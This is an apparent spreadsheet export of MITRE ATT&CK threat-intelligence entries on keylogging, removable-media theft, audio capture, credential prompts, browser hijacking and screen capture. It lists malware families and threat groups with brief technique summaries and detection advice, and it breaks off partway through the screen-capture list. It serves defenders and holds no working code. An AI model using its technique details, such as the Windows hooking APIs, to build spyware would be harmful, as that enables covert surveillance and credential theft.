[NightClub](https://attack.mitre.org/software/S1090) can use a plugin for keylogging.(Citation: MoustachedBouncer ESET August 2023)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)
OwaAuth
[OwaAuth](https://attack.mitre.org/software/S0072) captures and DES-encrypts credentials before writing the username and password to a log file, &lt;code&gt;C:\log.txt&lt;/code&gt;.(Citation: Dell TG-3390)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has the ability to capture keystrokes.(Citation: Bitdefender FunnyDream Campaign November 2020)
Peppy
[Peppy](https://attack.mitre.org/software/S0643) can log keystrokes on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has a module for capturing keystrokes per process including window titles.(Citation: CIRCL PlugX March 2013)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) contains a keylogger.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.(Citation: GitHub PoshC2)
PowerLess
[PowerLess](https://attack.mitre.org/software/S1012) can use a module to log keystrokes.(Citation: Cybereason PowerLess February 2022)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-Keystrokes&lt;/code&gt; Exfiltration module can log keystrokes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) contains a keylogger module that collects keystrokes and the titles of foreground windows.(Citation: ESET Operation Groundbait)
Proton
[Proton](https://attack.mitre.org/software/S0279) uses a keylogger to capture keystrokes.(Citation: objsee mac malware 2017)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.(Citation: GitHub Pupy)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can capture keystrokes on a compromised host.(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) has a built-in keylogger.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) has the ability to capture keystrokes on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can use  `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.(Citation: Talos ROKRAT)(Citation: Volexity InkySquid RokRAT August 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
Regin
[Regin](https://attack.mitre.org/software/S0019) contains a keylogger.(Citation: Kaspersky Regin)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) has a command for keylogging.(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) gathers and exfiltrates keystrokes from the machine.(Citation: Securelist Remexi Jan 2019)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) contains a keylogger component.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for keylogging.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)
Rover
[Rover](https://attack.mitre.org/software/S0090) has keylogging functionality.(Citation: Palo Alto Rover)
RunningRAT
[RunningRAT](https://attack.mitre.org/software/S0253) captures keystrokes and sends them back to the C2 server.(Citation: McAfee Gold Dragon)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) has a keylogging capability.(Citation: GitHub SILENTTRINITY Modules July 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has a keylogging capability.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) can continuously capture keystrokes.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)
SslMM
[SslMM](https://attack.mitre.org/software/S0058) creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.(Citation: Baumgartner Naikon 2015)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) contains keylogging functionality to steal passwords.(Citation: Alienvault Sykipot DOD Smart Cards)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;CGEventTap&lt;/code&gt; functions to perform keylogging.(Citation: Trendmicro Evolving ThiefQuest 2020)
TinyZBot
[TinyZBot](https://attack.mitre.org/software/S0004) contains keylogger functionality.(Citation: Cylance Cleaver)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture keystrokes on a compromised host.(Citation: Secureworks Karagany July 2019)
Unknown Logger
[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of recording keystrokes.(Citation: Forcepoint Monsoon)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) collects keystrokes from the victim machine.(Citation: Unit 42 VERMIN Jan 2018)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to install a live and offline keylogger, including through the use of the `GetAsyncKeyState` Windows API.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020) 
XAgentOSX
[XAgentOSX](https://attack.mitre.org/software/S0161) contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.(Citation: XAgentOSX 2017)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.(Citation: GDATA Zeus Panda June 2017)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has a feature to capture a remote computer's keystrokes using a keylogger.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) 
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)(Citation: Gh0stRAT ATT March 2019)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) has the capability to log keystrokes from the victim’s machine, both offline and online.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) has the ability to log keyboard events.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) is capable of logging keystrokes.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)
yty
[yty](https://attack.mitre.org/software/S0248) uses a keylogger plugin to gather keystrokes.(Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to collect files from a system's connected removable media. For example, data may be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor for unexpected/abnormal file accesses to removable media (optical disk drive, USB memory, etc.) connected to the compromised system. 
Data Loss Prevention
Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.
APT28
An [APT28](https://attack.mitre.org/groups/G0007) backdoor may collect the entire contents of an inserted USB device.(Citation: Microsoft SIR Vol 19)
Gamaredon Group
A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can collect files from USB thumb drives.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can find and collect data from removable media devices.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) copies files with certain extensions from USB devices to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from removable media with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a module to collect data from removable drives.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can monitor removable drives and exfiltrate files matching a given extension list.(Citation: ESET Crutch December 2020)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) can scan all .exe files located in the USB drive.(Citation: CheckPoint Volatile Cedar March 2015) 
FLASHFLOOD
[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by [SPACESHIP](https://attack.mitre.org/software/S0035).(Citation: FireEye APT30)
FunnyDream
The [FunnyDream](https://attack.mitre.org/software/S1044) FilePakMonitor component has the ability to collect files from removable devices.(Citation: Bitdefender FunnyDream Campaign November 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) steals files based on an extension list if a USB drive is connected to the system.(Citation: Talos GravityRAT)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can collect jpeg files from connected MTP devices.(Citation: ESET InvisiMole June 2020)
Machete
[Machete](https://attack.mitre.org/software/S0409) can find, encrypt, and upload files from fixed and removable drives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019) 
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to extract data from removable devices connected to the endpoint.(Citation: Talos Oblique RAT March 2021)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.(Citation: ESET Operation Groundbait)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)	
Remsec
[Remsec](https://attack.mitre.org/software/S0125) has a package that collects documents from any inserted USB sticks.(Citation: Kaspersky ProjectSauron Technical Analysis)
Rover
[Rover](https://attack.mitre.org/software/S0090) searches for files on attached removable drives based on a predefined list of file extensions every five seconds.(Citation: Palo Alto Rover)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)
USBStealer
Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
OS API Execution
Monitor for API calls associated with leveraging a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used an audio capturing utility known as SOUNDWAVE that captures microphone input.(Citation: FireEye APT37 Feb 2018)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing audio.(Citation: EFF Manul Aug 2016)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform voice recording on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can perform audio surveillance using microphones.(Citation: Kaspersky Transparent Tribe August 2020)
DOGCALL
[DOGCALL](https://attack.mitre.org/software/S0213) can capture microphone data from the victim's machine.(Citation: Unit 42 Nokki Oct 2018)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can listen in to victims' conversations through the system’s microphone.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing audio captures.(Citation: FireEye Periscope March 2018)
EvilGrab
[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture audio from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Flame
[Flame](https://attack.mitre.org/software/S0143) can record audio using any existing hardware recording devices.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Janicab
[Janicab](https://attack.mitre.org/software/S0163) captured audio and sent it out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has the ability to record audio.(Citation: Objective-See MacMa Nov 2021)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) can record the sounds from microphones on a computer.(Citation: objsee mac malware 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) captures audio from the computer’s microphone.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) can perform microphone recording.(Citation: Radware Micropsia July 2018)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) can capture audio feeds from the system.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can load a module to leverage the LAME encoder and `mciSendStringW` to control and capture audio.(Citation: MoustachedBouncer ESET August 2023)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-MicrophoneAudio&lt;/code&gt; Exfiltration module can record system microphone audio.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can record sound with the microphone.(Citation: GitHub Pupy)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) has an audio capture and eavesdropping module.(Citation: Securelist ScarCruft May 2019)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) can capture data from the system’s microphone.(Citation: Fortinet Remcos Feb 2017)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for microphone interception.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)
T9000
[T9000](https://attack.mitre.org/software/S0098) uses the Skype API to record audio and video calls. It writes encrypted data to &lt;code&gt;%APPDATA%\Intel\Skype&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) can perform audio capture.(Citation: Unit 42 VERMIN Jan 2018)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can capture microphone recordings.(Citation: Kaspersky Adwind Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments, such as requests for credentials and/or strings related to creating password prompts that may be malicious.(Citation: Spoofing credential dialogs)
Process Creation
Monitor for newly executed processes 
Script Execution
Monitor for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User Training
Use user training as a way to bring awareness and raise suspicion for potentially malicious events and dialog boxes (ex: Office documents prompting for credentials).
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has presented victims with spoofed Windows Authentication prompts to collect their credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) presents an input prompt asking for the user's login and password.(Citation: Symantec Calisto July 2018)
Dok
[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) prompts the users for credentials.(Citation: synack 2016 review)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has displayed fake forms on top of banking sites to intercept credentials from victims.(Citation: FireEye Metamorfo Apr 2018) 
Proton
[Proton](https://attack.mitre.org/software/S0279) prompts users for their credentials.(Citation: objsee mac malware 2017)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692)'s `credphisher.py` module can prompt a current user for their credentials.(Citation: GitHub SILENTTRINITY Modules July 2019)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) prompts the user to input credentials using a native macOS dialog box leveraging the system process &lt;code&gt;/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)
iKitten
[iKitten](https://attack.mitre.org/software/S0278) prompts the user for their credentials.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior.
Process Access
This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.
Process Modification
This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.
User Account Management
Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) opportunities can limit the exposure to this technique.
User Training
Close all browser sessions regularly and when they are no longer needed.
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has captured credentials when a user performs login through a SSL session.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.(Citation: Cybereason Chaes Nov 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.(Citation: Dell Dridex Oct 2015)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials.  [IcedID](https://attack.mitre.org/software/S0483) can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.(Citation: Securelist Brazilian Banking Malware July 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use advanced web injects to steal web banking credentials.(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Trend Micro Trickbot Nov 2018)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).(Citation: TrendMicro BKDR_URSNIF.SM)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.
OS API Execution
Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk, such as &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware). The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used tools to take screenshots from victims.(Citation: ESET Sednit Part 2)(Citation: XAgentOSX 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used a screen capture utility to take screenshots on a compromised host.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) took screenshots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)(Citation: Gigamon Berserk Bear October 2021)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) captured screenshots and desktop video recordings.(Citation: DOJ FIN7 Aug 2018)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.(Citation: Tetra Defense Sodinokibi March 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047)'s malware can take screenshots of the compromised computer every minute.(Citation: ESET Gamaredon June 2020)	
Group5
Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of watching the victim's screen.(Citation: Citizen Lab Group5)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware can take a screenshot and upload the file to its C2 server.(Citation: Unit 42 Magic Hound Feb 2017)
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used plugins to take screenshots on targeted systems.(Citation: MoustachedBouncer ESET August 2023)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can capture screenshots of the victim’s machine.(Citation: Securelist MuddyWater Oct 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has a tool called CANDYKING to capture a screenshot of user's desktop.(Citation: FireEye APT34 Webinar Dec 2017)
Silence
[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim’s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can take screenshots on a compromised host by calling a series of APIs.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) has the ability to view the screen on compromised hosts.(Citation: AsyncRAT GitHub)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can capture screenshots of the victim’s machines.(Citation: Unit42 Azorult Nov 2018)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can take screenshots and send them to an actor-controlled C2 server.(Citation: BitDefender BADHATCH Mar 2021)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) has a command to take a screenshot and send it to the C2 server.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) has a command to periodically take screenshots of the system.(Citation: Mandiant APT1 Appendix)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) captures screenshots in .jpg format and then exfiltrates them.(Citation: Unit 42 BadPatch Oct 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) is capable of taking an image of and uploading the current desktop.(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) is capable of taking screenshots.(Citation: Securelist BlackEnergy Nov 2014)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can take screenshots on compromised hosts.(Citation: Palo Alto Brute Ratel July 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) has the capability to capture screenshots.(Citation: DOJ GRU Indictment Jul 2018)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can take a screenshot of the desktop.(Citation: Unit42 Cannon Nov 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.(Citation: FireEye CARBANAK June 2017)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) can capture display screenshots with the screens_dll.dll plugin.(Citation: Prevx Carberp March 2011)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can capture screenshots.(Citation: PaloAlto CardinalRat Apr 2017)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) captures screenshots based on specific keywords in the window’s title.(Citation: Symantec Catchamas April 2018)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) can capture screenshots of the infected machine.(Citation: Cybereason Chaes Nov 2020)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) has the ability to capture screenshots.(Citation: Check Point APT35 CharmPower January 2022)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) has the ability to capture screenshots.(Citation: ESET Gelsemium June 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to capture screenshots.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload is capable of capturing screenshots.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cobalt Strike Manual 4.3 November 2020)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform screen capture.(Citation: Zscaler Cobian Aug 2017)
ConnectWise
[ConnectWise](https://attack.mitre.org/software/S0591) can take screenshots on remote hosts.(Citation: Anomali Static Kitten February 2021)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) takes periodic screenshots and exfiltrates them.(Citation: F-Secure Cosmicduke)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a command to perform screen captures.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
CrossRAT
[CrossRAT](https://attack.mitre.org/software/S0235) is capable of taking screen captures.(Citation: Lookout Dark Caracal Jan 2018)
DOGCALL
[DOGCALL](https://attack.mitre.org/software/S0213) is capable of capturing screenshots of the victim's machine.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) can take screenshots.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing screen captures.(Citation: FireEye Periscope March 2018)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)
ECCENTRICBANDWAGON
